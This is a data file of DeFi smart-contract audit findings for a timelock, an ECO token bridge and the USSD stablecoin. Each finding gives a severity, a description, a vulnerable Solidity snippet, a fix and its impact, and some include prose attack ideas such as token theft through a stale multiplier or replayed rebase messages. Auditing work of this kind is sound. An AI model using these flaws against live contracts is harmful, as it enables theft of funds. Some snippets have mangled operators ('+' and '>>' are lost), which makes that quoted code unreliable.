maliciousчmediumчThe call flow of removeOracleSIgner incorrectly compares the hash of (\"removeOracleSigner\", account) with the hash of (\"addOracleSigner\", account) for validating that an action is actually initiated. This validation always fails because the hashes can never match.\\nThe process of removing oracle signers is 2 stage. 
First function `signalRemoveOracleSigner` is called by the TimelockAdmin which stores a time-delayed timestamp corresponding to the keccak256 hash of (\"removeOracleSigner\", account) - a bytes32 value called actionKey in the pendingActions mapping.\\nThen the Admin needs to call function `removeOracleSignerAfterSignal` but this function calls `_addOracleSignerActionKey` instead of `_removeOracleSignerActionKey` for calculating the bytes32 action key value. Now the actionKey is calculated as keccak256 hash of (\"addOracleSigner\", account) and this hash is used for checking if this action is actually pending by ensuring its timestamp is not zero inside the `_validateAction` function called via `_validateAndClearAction` function at Line 122. The hash of (\"removeOracleSigner\", account) can never match hash of (\"addOracleSigner\", account) and thus this validation will fail.\\n```\\n function removeOracleSignerAfterSignal(address account) external onlyTimelockAdmin nonReentrant {\\n bytes32 actionKey = _addOracleSignerActionKey(account);\\n _validateAndClearAction(actionKey, \"removeOracleSigner\");\\n\\n oracleStore.removeSigner(account);\\n\\n EventUtils.EventLogData memory eventData;\\n eventData.addressItems.initItems(1);\\n eventData.addressItems.setItem(0, \"account\", account);\\n eventEmitter.emitEventLog1(\\n \"RemoveOracleSigner\",\\n actionKey,\\n eventData\\n );\\n }\\n```\\nчReplace the call to _addOracleSignerActionKey at Line 118 by call to _removeOracleSignerActionKeyчThe process of removing an Oracle Signer will always revert and this breaks an important safety measure if a certain oracle signer becomes malicious the TimelockAdmin could do nothing(these functions are meant for this). 
Hence, important functionality is permanently broken.ч```\\n function removeOracleSignerAfterSignal(address account) external onlyTimelockAdmin nonReentrant {\\n bytes32 actionKey = _addOracleSignerActionKey(account);\\n _validateAndClearAction(actionKey, \"removeOracleSigner\");\\n\\n oracleStore.removeSigner(account);\\n\\n EventUtils.EventLogData memory eventData;\\n eventData.addressItems.initItems(1);\\n eventData.addressItems.setItem(0, \"account\", account);\\n eventEmitter.emitEventLog1(\\n \"RemoveOracleSigner\",\\n actionKey,\\n eventData\\n );\\n }\\n```\\n -Stale inflationMultiplier in L1ECOBridgeчhighч`L1ECOBridge::inflationMultiplier` is updated through `L1ECOBridge::rebase` on Ethereum, and it is used in `_initiateERC20Deposit` and `finalizeERC20Withdrawal` to convert between token amount and `_gonsAmount`. However, if `rebase` is not called in a timely manner, the `inflationMultiplier` value can be stale and inconsistent with the value of L1 ECO token during transfer, leading to incorrect token amounts in deposit and withdraw.\\nThe `inflationMultiplier` value is updated in `rebase` with an independent transaction on L1 as shown below:\\n```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(block.number);\\n```\\n\\nHowever, in both `_initiateERC20Deposit`, `transferFrom` is called before the `inflationMultiplier` is used, which can lead to inconsistent results if `rebase` is not called on time for the `inflationMultiplier` to be updated. The code snippet for `_initiateERC20Deposit` is as follows:\\n```\\n IECO(_l1Token).transferFrom(_from, address(this), _amount);\\n _amount = _amount * inflationMultiplier;\\n```\\n\\n`finalizeERC20Withdrawal` has the same problem.\\n```\\n uint256 _amount = _gonsAmount / inflationMultiplier;\\n bytes memory _ecoTransferMessage = abi.encodeWithSelector(IERC20.transfer.selector,_to,_amount);\\n```\\n\\nThe same problem does not exist in L2ECOBridge. 
Because the L2 rebase function updates inflationMultiplier and rebases the l2Eco token synchronously.\n```\n function rebase(uint256 _inflationMultiplier)\n external\n virtual\n onlyFromCrossDomainAccount(l1TokenBridge)\n validRebaseMultiplier(_inflationMultiplier)\n {\n inflationMultiplier = _inflationMultiplier;\n l2Eco.rebase(_inflationMultiplier);\n emit RebaseInitiated(_inflationMultiplier);\n }\n```\nчCalling `IECO(l1Eco).getPastLinearInflation(block.number)` instead of using `inflationMultiplier`.чThe attacker can steal tokens with this.\nHe can deposit to L1 bridge when he observes a stale larger value and he will receive more tokens on L2.ч```\n function rebase(uint32 _l2Gas) external {\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(block.number);\n```\n -Malicious actor cause rebase to an old inflation multiplierчhighчThe protocol has a rebasing mechanism that allows to sync the inflation multiplier between both L1 and L2 chains. The call to rebase is permissionless (anyone can trigger it). Insufficient checks allow a malicious actor to rebase to an old value.\n```\n function rebase(uint32 _l2Gas) external {\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(\n block.number\n );\n\n bytes memory message = abi.encodeWithSelector(\n IL2ECOBridge.rebase.selector,\n inflationMultiplier\n );\n\n sendCrossDomainMessage(l2TokenBridge, _l2Gas, message);\n }\n```\n\nA malicious actor can call this function a large amount of times to queue messages on `L2CrossDomainMessenger`. Since it is expensive to execute so many messages from `L2CrossDomainMessenger` (especially if the malicious actor sets `_l2Gas` to a high value) there will be a rebase message that will not be relayed through `L2CrossDomainMessenger` (or in failedMessages array).\nSome time passes and other legitimate rebase transactions get executed.\nOne day the malicious actor can execute one of his old rebase messages and set the value to the old value. 
The attacker will debalance the scales between L1 and L2 and can profit from it.чWhen sending a rebase from L1, include in the message the L1 block number. In L2 rebase, validate that the new rebase block number is above previous block numberчdebalance the scales between L1 and L2 ECO tokenч```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(\\n block.number\\n );\\n\\n bytes memory message = abi.encodeWithSelector(\\n IL2ECOBridge.rebase.selector,\\n inflationMultiplier\\n );\\n\\n sendCrossDomainMessage(l2TokenBridge, _l2Gas, message);\\n }\\n```\\n -`StableOracleDAI` calculates `getPriceUSD` with inverted base/rate tokens for Chainlink priceчhighч`StableOracleDAI::getPriceUSD()` calculates the average price between the Uniswap pool price for a pair and the Chainlink feed as part of its result.\\nThe problem is that it uses `WETH/DAI` as the base/rate tokens for the pool, and `DAI/ETH` for the Chainlink feed, which is the opposite.\\nThis will incur in a huge price difference that will impact on the amount of USSD tokens being minted, while requesting the price from this oracle.\\nIn `StableOracleDAI::getPrice()` the `price` from the Chainlink feed `priceFeedDAIETH` returns the `price` as DAI/ETH.\\nThis can be checked on Etherscan and the Chainlink Feeds Page.\\nAlso note the comment on the code is misleading, as it is refering to another pair:\\nchainlink price data is 8 decimals for WETH/USD\\n```\\n/// constructor\\n priceFeedDAIETH = AggregatorV3Interface(\\n 0x773616E4d11A78F511299002da57A0a94577F1f4\\n );\\n\\n/// getPrice()\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n```\\n\\nLink to code\\nOn the other hand, the price coming from the 
Uniswap pool `DAIWethPrice` returns the price as `WETH/DAI`.\\nNote that the relation WETH/DAI is given by the orders of the token addresses passed as arguments, being the first the base token, and the second the quote token.\\nAlso note that the variable name `DAIWethPrice` is misleading as well as the base/rate are the opposite (although this doesn't affect the code).\\n```\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token) // @audit\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token) // @audit\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n```\\n\\nLink to code\\nFinally, both values are used to calculate an average price of in `((DAIWethPrice + uint256(price) * 1e10) / 2)`.\\nBut as seen, one has price in `DAI/ETH` and the other one in `WETH/DAI`, which leads to an incorrect result.\\n```\\n return\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\n\\nLink to code\\nThe average will be lower in this case, and the resulting price higher.\\nThis will be used by `USSD::mintForToken()` for calculating the amount of tokens to mint for the user, and thus giving them much more than they should.\\nAlso worth mentioning that `USSDRebalancer::rebalance()` also relies on the result of this price calculation and will make it perform trades with incorrect values.чCalculate the inverse of the `price` returned by the Chainlink feed so that it can be averaged with the pool `price`, making sure that both use the correct `WETH/DAI` and `ETH/DAI` base/rate tokens.чUsers will receive far more USSD tokens than they should when they call `mintForToken()`, ruining the token value.\\nWhen performed the `USSDRebalancer::rebalance()`, all the calculations will be broken for the DAI oracle, leading to incorrect pool trades due to the error in `getPrice()`ч```\\n/// constructor\\n priceFeedDAIETH = 
AggregatorV3Interface(\\n 0x773616E4d11A78F511299002da57A0a94577F1f4\\n );\\n\\n/// getPrice()\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n```\\n -`USSDRebalancer.sol#SellUSSDBuyCollateral` the check of whether collateral is DAI is wrongчhighчThe `SellUSSDBuyCollateral` function uses `||` instead of `&&` to check whether the collateral is DAI. It is wrong and may cause the `SellUSSDBuyCollateral` function to revert.\\n```\\n196 for (uint256 i = 0; i < collateral.length; i++) {\\n197 uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n198 if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n199 if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n200 // don't touch DAI if it's needed to be bought (it's already bought)\\n201 IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n202 }\\n203 }\\n204 }\\n```\\n\\nLine 199 should use `&&` instead of `||` to ensure that the token is not DAI. 
If the token is DAI, the `UniV3SwapInput` function will revert because that DAI's `pathbuy` is empty.ч```\\n for (uint256 i = 0; i < collateral.length; i// Add the line below\\n// Add the line below\\n) {\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n// Remove the line below\\n if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n// Add the line below\\n if (collateral[i].token != uniPool.token0() && collateral[i].token != uniPool.token1()) {\\n // don't touch DAI if it's needed to be bought (it's already bought)\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n }\\n }\\n }\\n```\\nчThe `SellUSSDBuyCollateral` will revert and USSD will become unstable.ч```\\n196 for (uint256 i = 0; i < collateral.length; i++) {\\n197 uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n198 if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n199 if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n200 // don't touch DAI if it's needed to be bought (it's already bought)\\n201 IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n202 }\\n203 }\\n204 }\\n```\\n -The getOwnValuation() function contains errors in the price calculationчhighчThe getOwnValuation() function in the provided code has incorrect price calculation logic when token0() or token1() is equal to USSD. The error leads to inaccurate price calculations.\\nThe `USSDRebalancer.getOwnValuation()` function calculates the price based on the sqrtPriceX96 value obtained from the uniPool.slot0() function. 
The calculation depends on whether token0() is equal to USSD or not. If token0() is equal to USSD, the price calculation is performed as follows:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))/(1e6) (96 * 2);\\n```\\n\\nHowever, there is an error in the price calculation logic. The calculation should be:\\n```\\nprice = uint(sqrtPriceX96) * uint(sqrtPriceX96) * 1e6 (96 * 2);\\n```\\n\\nIf token0() is not equal to USSD, the price calculation is slightly different:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e18 /* 1e12 + 1e6 decimal representation */) (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\n\\nThe calculation should be:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e6 /* 1e12 + 1e6 decimal representation */) (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\nчWhen token0() is USSD, the correct calculation should be uint(sqrtPriceX96) * uint(sqrtPriceX96) * 1e6 >> (96 * 2). When token1() is USSD, the correct calculation should be\\n```\\nprice = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e6 /* 1e12 + 1e6 decimal representation */) (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\nчThe incorrect price calculation in the getOwnValuation() function can lead to significant impact on the valuation of assets in the UniSwap V3 pool. 
The inaccurate prices can result in incorrect asset valuations, which may affect trading decisions, liquidity provision, and overall financial calculations based on the UniSwap V3 pool.ч```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))/(1e6) (96 * 2);\\n```\\n -The price from `StableOracleDAI` is returned with the incorrect number of decimalsчhighчThe price returned from the `getPriceUSD` function of the `StableOracleDAI` is scaled up by `1e10`, which results in 28 decimals instead of the intended 18.\\nIn `StableOracleDAI` the `getPriceUSD` function is defined as follows...\\n```\\n function getPriceUSD() external view override returns (uint256) {\\n address[] memory pools = new address[](1);\\n pools[0] = 0x60594a405d53811d3BC4766596EFD80fd545A270;\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token)\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token)\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n\\n uint256 wethPriceUSD = ethOracle.getPriceUSD();\\n\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price,,,) = priceFeedDAIETH.latestRoundData();\\n\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n }\\n```\\n\\nThe assumption is made that the `DAIWethPrice` is 8 decimals, and is therefore multiplied by `1e10` in the return statement to scale it up to 18 decimals.\\nThe other price feeds used in the protocol are indeed received with decimals, however, the Chainlink DAI/ETH price feed returns a value with 18 decimals as can be seen on their site.чRemove the `* 1e10` from the return statement.\\n```\\n// Remove the line below\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice // 
Add the line below\\n uint256(price) * 1e10) / 2);\\n// Add the line below\\n return (wethPriceUSD * 1e18) / (DAIWethPrice // Add the line below\\n uint256(price) / 2);\\n```\\nчThis means that the price returned from the `getPriceUSD` function is scaled up by `1e10`, which results in 28 decimals instead of the intended 18, drastically overvaluing the DAI/USD price.\\nThis will result in the USSD token price being a tiny fraction of what it is intended to be. Instead of being pegged to $1, it will be pegged to $0.0000000001, completely defeating the purpose of the protocol.\\nFor example, if a user calls `USSD.mintForToken`, supplying DAI, they'll be able to mint `1e10` times more USSD than intended.ч```\\n function getPriceUSD() external view override returns (uint256) {\\n address[] memory pools = new address[](1);\\n pools[0] = 0x60594a405d53811d3BC4766596EFD80fd545A270;\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token)\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token)\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n\\n uint256 wethPriceUSD = ethOracle.getPriceUSD();\\n\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price,,,) = priceFeedDAIETH.latestRoundData();\\n\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n }\\n```\\n -Wrong computation of the amountToSellUnit variableчhighчThe variable `amountToSellUnits` is computed wrongly in the code which will lead to an incorrect amount of collateral to be sold.\\nThe `BuyUSSDSellCollateral()` function is used to sell collateral during a peg-down recovery event. 
The computation of the amount to sell is computed using the following formula:\\n```\\n// @audit-issue Wrong computation\\nuint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n```\\n\\nThe idea is to sell an amount which is equivalent (in USD) to the ratio of `amountToBuyLeftUSD / collateralval`. Flattening the equation it ends up as:\\n```\\nuint256 amountToSellUnits = (collateralBalance * amountToBuyLeftUSD * 1e18) / (collateralval * 1e18 * 1e18);\\n\\n// Reducing the equation\\nuint256 amountToSellUnits = (collateralBalance * amountToBuyLeftUSD) / (collateralval * 1e18);\\n```\\n\\n`amountToBuyLeftUSD` and `collateralval` already have 18 decimals so their decimals get cancelled together which will lead the last 1e18 factor as not necessary.чIssue Wrong computation of the amountToSellUnit variable\\nDelete the last 1e18 factorчThe contract will sell an incorrect amount of collateral during a peg-down recovery event.ч```\\n// @audit-issue Wrong computation\\nuint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n```\\n -Calls to Oracles don't check for stale pricesчmediumчCalls to Oracles don't check for stale prices.\\nNone of the oracle calls check for stale prices, for example StableOracleDAI.getPriceUSD():\\n```\\n(, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n\\nreturn\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\nчRead the `updatedAt` parameter from the calls to `latestRoundData()` and verify that it isn't older than a set amount, eg:\\n```\\nif (updatedAt < block.timestamp - 60 * 60 /* 1 hour */) {\\n revert(\"stale price feed\");\\n}\\n```\\nчOracle price feeds can become stale due to a variety of reasons. 
Using a stale price will result in incorrect calculations in most of the key functionality of USSD & USSDRebalancer contracts.ч```\\n(, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n\\nreturn\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\n -rebalance process incase of selling the collateral, could revert because of underflow calculationчmediumчThe rebalance process will try to sell the collateral in case of peg-down. However, the process can revert because the calculation can underflow.\\nInside `rebalance()` call, if `BuyUSSDSellCollateral()` is triggered, it will try to sell the current collateral to `baseAsset`. The asset that will be sold (amountToSellUnits) is first calculated. Then it is swapped to `baseAsset` via uniswap. However, `amountToBuyLeftUSD` is then reduced by the result of `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)`. There is no guarantee `amountToBuyLeftUSD` is always bigger than `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)`.\\nThis can cause the call to revert in case `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`.\\nThere are two branches where `amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` is performed:\\nIn case `collateralval > amountToBuyLeftUSD`\\n`collateralval` is calculated using oracle price, thus the result of the swap is not guaranteed to reflect the proportion of `amountToBuyLeftUSD` against the `collateralval` ratio, and could result in returning `baseAsset` larger than expected. 
And potentially `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`\\n```\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } else {\\n```\\n\\nIncase `collateralval < amountToBuyLeftUSD`\\nThis also can't guarantee `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` < `amountToBuyLeftUSD`.\\n```\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n }\\n```\\nчCheck if `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`, in that case, just set `amountToBuyLeftUSD` to 0.\\n```\\n // rest of code\\n uint baseAssetChange = IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n if (baseAssetChange > amountToBuyLeftUSD) {\\n amountToBuyLeftUSD = 0;\\n } else {\\n amountToBuyLeftUSD -= baseAssetChange;\\n }\\n DAItosell += baseAssetChange;\\n // rest of 
code\\n```\\nчRebalance process can revert caused by underflow calculation.ч```\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } else {\\n```\\n -StableOracleWBTC use BTC/USD chainlink oracle to price WBTC which is problematic if WBTC depegsчmediumчThe StableOracleWBTC contract utilizes a BTC/USD Chainlink oracle to determine the price of WBTC. However, this approach can lead to potential issues if WBTC were to depeg from BTC. In such a scenario, WBTC would no longer maintain an equivalent value to BTC. This can result in significant problems, including borrowing against a devalued asset and the accumulation of bad debt. Given that the protocol continues to value WBTC based on BTC/USD, the issuance of bad loans would persist, exacerbating the overall level of bad debt.\\nImportant to note that this is like a 2 in 1 report as the same idea could work on the StableOracleWBGL contract too.\\nThe vulnerability lies in the reliance on a single BTC/USD Chainlink oracle to obtain the price of WBTC. If the bridge connecting WBTC to BTC becomes compromised and WBTC depegs, WBTC may depeg from BTC. Consequently, WBTC's value would no longer be equivalent to BTC, potentially rendering it worthless (hopefully this never happens). 
The use of the BTC/USD oracle to price WBTC poses risks to the protocol and its users.\\nThe following code snippet represents the relevant section of the StableOracleWBTC contract responsible for retrieving the price of WBTC using the BTC/USD Chainlink oracle:\\n```\\ncontract StableOracleWBTC is IStableOracle {\\n AggregatorV3Interface priceFeed;\\n\\n constructor() {\\n priceFeed = AggregatorV3Interface(\\n 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\\n\\n );\\n }\\n\\n function getPriceUSD() external view override returns (uint256) {\\n (, int256 price, , , ) = priceFeed.latestRoundData();\\n // chainlink price data is 8 decimals for WBTC/USD\\n return uint256(price) * 1e10;\\n }\\n}\\n```\\n\\nNB: key to note that the above pricefeed is set to the wrong aggregator, the correct one is this: `0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599`чTo mitigate the vulnerability mentioned above, it is strongly recommended to implement a double oracle setup for WBTC pricing. This setup would involve integrating both the BTC/USD Chainlink oracle and an additional on-chain liquidity-based oracle, such as UniV3 TWAP.\\nThe double oracle setup serves two primary purposes. Firstly, it reduces the risk of price manipulation by relying on the Chainlink oracle, which ensures accurate pricing for WBTC. Secondly, incorporating an on-chain liquidity-based oracle acts as a safeguard against WBTC depegging. By monitoring the price derived from the liquidity-based oracle and comparing it to the Chainlink oracle's price, borrowing activities can be halted if the threshold deviation (e.g., 2% lower) is breached.\\nAdopting a double oracle setup enhances the protocol's stability and minimizes the risks associated with WBTC depegging. It ensures accurate valuation, reduces the accumulation of bad debt, and safeguards the protocol and its usersчShould the WBTC bridge become compromised or WBTC depeg from BTC, the protocol would face severe consequences. 
The protocol would be burdened with a substantial amount of bad debt stemming from outstanding loans secured by WBTC. Additionally, due to the protocol's reliance on the BTC/USD oracle, the issuance of loans against WBTC would persist even if its value has significantly deteriorated. This would lead to an escalation in bad debt, negatively impacting the protocol's financial stability and overall performance.ч```\\ncontract StableOracleWBTC is IStableOracle {\\n AggregatorV3Interface priceFeed;\\n\\n constructor() {\\n priceFeed = AggregatorV3Interface(\\n 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\\n\\n );\\n }\\n\\n function getPriceUSD() external view override returns (uint256) {\\n (, int256 price, , , ) = priceFeed.latestRoundData();\\n // chainlink price data is 8 decimals for WBTC/USD\\n return uint256(price) * 1e10;\\n }\\n}\\n```\\n -Inaccurate collateral factor calculation due to missing collateral assetчmediumчThe function `collateralFactor()` in the smart contract calculates the collateral factor for the protocol but fails to account for the removal of certain collateral assets. As a result, the total value of the removed collateral assets is not included in the calculation, leading to an inaccurate collateral factor.\\nThe `collateralFactor()` function calculates the current collateral factor for the protocol. It iterates through each collateral asset in the system and calculates the total value of all collateral assets in USD.\\nFor each collateral asset, the function retrieves its balance and converts it to a USD value by multiplying it with the asset's price in USD obtained from the corresponding oracle. The balance is adjusted for the decimal precision of the asset. 
These USD values are accumulated to calculate the totalAssetsUSD.\\n```\\n function collateralFactor() public view override returns (uint256) {\\n uint256 totalAssetsUSD = 0;\\n for (uint256 i = 0; i < collateral.length; i++) {\\n totalAssetsUSD +=\\n (((IERC20Upgradeable(collateral[i].token).balanceOf(\\n address(this)\\n ) * 1e18) /\\n (10 **\\n IERC20MetadataUpgradeable(collateral[i].token)\\n .decimals())) *\\n collateral[i].oracle.getPriceUSD()) /\\n 1e18;\\n }\\n\\n return (totalAssetsUSD * 1e6) / totalSupply();\\n }\\n```\\n\\nHowever, when a collateral asset is removed from the collateral list, the `collateralFactor` function fails to account for its absence. This results in an inaccurate calculation of the collateral factor. Specifically, the totalAssetsUSD variable does not include the value of the removed collateral asset, leading to an underestimation of the total collateral value. The function `SellUSSDBuyCollateral()` in the smart contract is used for rebalancing. However, it relies on the `collateralFactor` calculation, which has been found to be inaccurate. The `collateralFactor` calculation does not accurately assess the portions of collateral assets to be bought or sold during rebalancing. 
This discrepancy can lead to incorrect rebalancing decisions and potentially impact the stability and performance of the protocol.\\n```\\n function removeCollateral(uint256 _index) public onlyControl {\\n collateral[_index] = collateral[collateral.length - 1];\\n collateral.pop();\\n }\\n```\\nчEnsure accurate calculations and maintain the integrity of the collateral factor metric in the protocol's risk management system.чAs a consequence, the reported collateral factor may be lower than it should be, potentially affecting the risk assessment and stability of the protocol.ч```\\n function collateralFactor() public view override returns (uint256) {\\n uint256 totalAssetsUSD = 0;\\n for (uint256 i = 0; i < collateral.length; i++) {\\n totalAssetsUSD +=\\n (((IERC20Upgradeable(collateral[i].token).balanceOf(\\n address(this)\\n ) * 1e18) /\\n (10 **\\n IERC20MetadataUpgradeable(collateral[i].token)\\n .decimals())) *\\n collateral[i].oracle.getPriceUSD()) /\\n 1e18;\\n }\\n\\n return (totalAssetsUSD * 1e6) / totalSupply();\\n }\\n```\\n -Inconsistency handling of DAI as collateral in the BuyUSSDSellCollateral functionчmediumчDAI is the base asset of the `USSD.sol` contract, when a rebalacing needs to occur during a peg-down recovery, collateral is sold for DAI, which then is used to buy USSD in the DAI / USSD uniswap pool. 
Hence, when DAI is the collateral, this is not sold because there does not exist a path to sell DAI for DAI.\\nThe above behavior is handled when collateral is about to be sold for DAI, see the comment `no need to swap DAI` (link to the code):\\n```\\nif (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } \\n else {\\n // no need to swap DAI\\n DAItosell = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * amountToBuyLeftUSD / collateralval;\\n }\\n}\\n\\nelse {\\n // @audit-issue Not handling the case where this is DAI as is done above.\\n // sell all or skip (if collateral is too little, 5% treshold)\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = 